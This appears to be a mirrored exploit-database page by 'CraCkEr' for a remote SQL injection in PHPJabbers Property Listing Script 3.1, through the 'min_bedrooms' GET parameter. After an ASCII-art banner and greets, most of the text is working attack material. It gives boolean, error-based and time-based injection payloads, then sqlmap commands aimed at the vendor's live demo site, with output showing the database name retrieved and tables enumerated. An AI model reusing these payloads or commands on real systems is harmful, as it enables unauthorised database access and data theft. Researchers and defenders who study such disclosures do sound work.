Property Listing Script 3.1 SQL Injection Vulnerability exploit

Share

## https://sploitus.com/exploit?id=1337DAY-ID-37843 ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Property Listing Script │ │ Software : Property Listing Script 3.1 │ │ │ │ Vuln Type: Remote SQL Injection │ │ Script will give you │ │ Method : GET │ │ the tools to efficiently manage │ │ Critical : High [░░▒▒▓▓██] │ │ your own real estate portal │ │ Impact : Database Access │ │ │ │ │ │ │ │ ────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/property-listing-script/#sectionDemo [INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable GET parameter 'min_bedrooms' is vulnerable. sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests: --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861 --- sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5 [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.6 [01:13:36] [INFO] fetching current database [01:13:36] [INFO] retrieved: 'pjabbers_demo_pls' current database: 'pjabbers_demo_pls' sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861